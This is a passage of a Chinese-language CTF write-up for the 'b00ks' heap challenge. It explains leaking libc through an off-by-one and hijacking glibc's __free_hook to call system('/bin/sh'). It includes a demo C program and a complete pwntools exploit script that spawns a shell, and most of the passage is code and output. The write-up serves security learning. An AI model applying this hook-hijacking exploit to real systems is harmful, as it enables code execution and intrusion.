1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Name: &#x27;</span>)</span><br><span class="line">book2_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book2_addr:&quot;</span>+<span class="built_in">hex</span>(book2_addr))</span><br><span class="line"><span class="comment">###############新加入内容###################</span></span><br><span class="line">libc_base = book2_addr + (<span class="number">0x7f83dba36000</span> - <span class="number">0x7f83dba14010</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc base:&#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">debug()</span><br></pre></td></tr></table></figure>

<p>跑跑看效果如何：</p>
<p><img src="https://img-blog.csdnimg.cn/20201202183448948.png" alt="在这里插入图片描述"></p>
<p>可以看到libc_base和vmmap的结果一模一样。<br> 到此libc基地址获取成功。</p>
<h4 id="执行shell"><a href="#执行shell" class="headerlink" title="执行shell"></a>执行shell</h4><p>在堆中，我们常用__free_hook挟持执行流。<br> 先来看看__free_hook是干嘛的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __libc_free(<span class="type">void</span> *mem) &#123;</span><br><span class="line">    mstate    ar_ptr;</span><br><span class="line">    mchunkptr p; <span class="comment">/* chunk corresponding to mem */</span></span><br><span class="line">    <span class="comment">// 判断是否有钩子函数 __free_hook</span></span><br><span class="line">    <span class="type">void</span> (*hook)(<span class="type">void</span> *, <span class="type">const</span> <span class="type">void</span> *) = atomic_forced_read(__free_hook);</span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect(hook != <span class="literal">NULL</span>, <span class="number">0</span>)) &#123;</span><br><span class="line">        (*hook)(mem, RETURN_ADDRESS(<span class="number">0</span>));</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="comment">//略……</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单一句话概括：当调用free函数时，会检测__free_hook函数是否为空，如果不是，则先执行__free_hook。<br> 研究__free_hook的内部太麻烦了，直接看__free_hook的性质：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="title function_">void</span> <span class="params">(*__free_hook)</span> <span class="params">(<span class="type">void</span> *__ptr,<span class="type">const</span> <span class="type">void</span> *)</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">char</span> *str = <span class="built_in">malloc</span>(<span class="number">160</span>);</span><br><span class="line">	<span class="built_in">strcpy</span>(str,<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;__free_hook: 0x%016X\n&quot;</span>,__free_hook);</span><br><span class="line">	<span class="comment">// 劫持__free_hook</span></span><br><span class="line">	__free_hook = system;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">free</span>(str);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>执行结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">ex@ubuntu:~/test$ gcc -o demo -g demo.c </span><br><span class="line">demo.c: In function ‘main’:</span><br><span class="line">demo.c:12:9: warning: format ‘%X’ expects argument of type ‘unsigned int’, but argument 2 has type ‘void (*)(void *, const void *)’ [-Wformat=]</span><br><span class="line">  printf(&quot;__free_hook: 0x%016X\n&quot;,__free_hook);</span><br><span class="line">         ^</span><br><span class="line">demo.c:14:14: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]</span><br><span class="line">  __free_hook = system;</span><br><span class="line">              ^</span><br><span class="line">ex@ubuntu:~/test$ ./demo </span><br><span class="line">__free_hook: 0x0000000000000000</span><br><span class="line">$ echo hello world</span><br><span class="line">hello world</span><br><span class="line">$ </span><br></pre></td></tr></table></figure>

<p>再简单一句话概括：__free_hook执行时会把chunk中的用户数据作为参数。<br> 所以挟持的步骤：</p>
<ol>
<li><p>把__free_hook的地址改为system地址</p>
</li>
<li><p>把待free的chunk中的内容改为’&#x2F;bin&#x2F;sh’</p>
</li>
<li><p>执行free(之前修改的chunk)</p>
<p>已经得到解题的所有步骤了，那么执行shell的步骤如下：</p>
<p>通过libc基地址得到freehook地址，system地址，binsh地址<br>由于之前已经将fakebook的description所指向的地址改为book2的name地址，所以可以通过修改book1的description来修改book2的name指针，和description指针所指向的内容。因此我们可以把book2的name改为’&#x2F;bin&#x2F;sh’把它的description改为’__free_hook’的地址。<br>通过步骤2，我们已经把book2的description所指向的地址改成了__free_hook，因此此时修改book2的description就是修改__free_hook的地址，因此此时只要修改book2的description为system的地址。<br>free(book2) pwn!!!!!!!!!!</p>
<h2 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h2></li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> pwnlib</span><br><span class="line"> </span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./b00ks&#x27;</span>)</span><br><span class="line"><span class="comment">#p = remote(&#x27;node3.buuoj.cn&#x27;,26090)</span></span><br><span class="line">p = process(<span class="string">&#x27;./b00ks&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    p.recvline()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">name_size, name, desc_size, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(name_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(desc_size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">book_id</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(book_id))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">book_id, desc</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(book_id))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(desc)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">printf</span>():</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change_author</span>(<span class="params">author</span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">    p.sendline(author)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">init()</span><br><span class="line">book1_name = <span class="number">0x40</span></span><br><span class="line">book1_des = <span class="number">0x20</span></span><br><span class="line">create(book1_name, <span class="string">&#x27;a&#x27;</span>, book1_des, <span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">create(<span class="number">0x21000</span>, <span class="string">&#x27;c&#x27;</span>, <span class="number">0x21000</span>, <span class="string">&#x27;d&#x27;</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">book1_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book1_addr:&quot;</span>+<span class="built_in">hex</span>(book1_addr))</span><br><span class="line">edit(<span class="number">1</span>, p64(<span class="number">1</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(book1_addr+<span class="number">0x38</span>)+p64(<span class="number">0xffff</span>))</span><br><span class="line">change_author(<span class="string">&#x27;A&#x27;</span>*<span class="number">32</span>)</span><br><span class="line">printf()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ID: 1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Name: &#x27;</span>)</span><br><span class="line">book2_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;book2_addr:&quot;</span>+<span class="built_in">hex</span>(book2_addr))</span><br><span class="line">libc_base = book2_addr + (<span class="number">0x7f1b0ac89000</span> - <span class="number">0x7f1b0ac42010</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc base:&#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">elf_base = libc_base + libc.sym[<span class="string">&#x27;free&#x27;</span>] - elf.plt[<span class="string">&#x27;free&#x27;</span>]</span><br><span class="line">free_hook = libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>] + libc_base</span><br><span class="line">system = libc.symbols[<span class="string">&#x27;system&#x27;</span>] + libc_base</span><br><span class="line">binsh_addr = libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>() + libc_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;free_hook = &quot;</span>+ <span class="built_in">hex</span>(free_hook))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system = &quot;</span>+ <span class="built_in">hex</span>(system))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;binsh_addr = &quot;</span>+ <span class="built_in">hex</span>(binsh_addr))</span><br><span class="line">payload = p64(binsh_addr) + p64(free_hook)</span><br><span class="line">edit(<span class="number">1</span>, payload)</span><br><span class="line">payload = p64(system)</span><br><span class="line">edit(<span class="number">2</span>, payload)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
</article>

  </main>
  <aside>
    <p>This is an `aside`, a useful place to put information of any kind: metadata about the site author (with or without pictures), brief information about the purposes of the site, a static collection of external links or anything else.</p>
<p>For some Classless themes pictures and data about the author may suit better in the `cover` and `description` site attributes (see `config.toml`), but most of the times that kind of information will fit here better.</p>

  </aside>
  <footer role="contentinfo">
    <p>A default site footer. If you don't know what to place here maybe you should just write your name plus the current year?</p>
<p>If you want to have a sitemap, a contact form or other complex stuff, most Classless themes will also handle it nicely. Or you can take a look at the <code>aside.html</code> partial.</p>

  </footer>
</body>
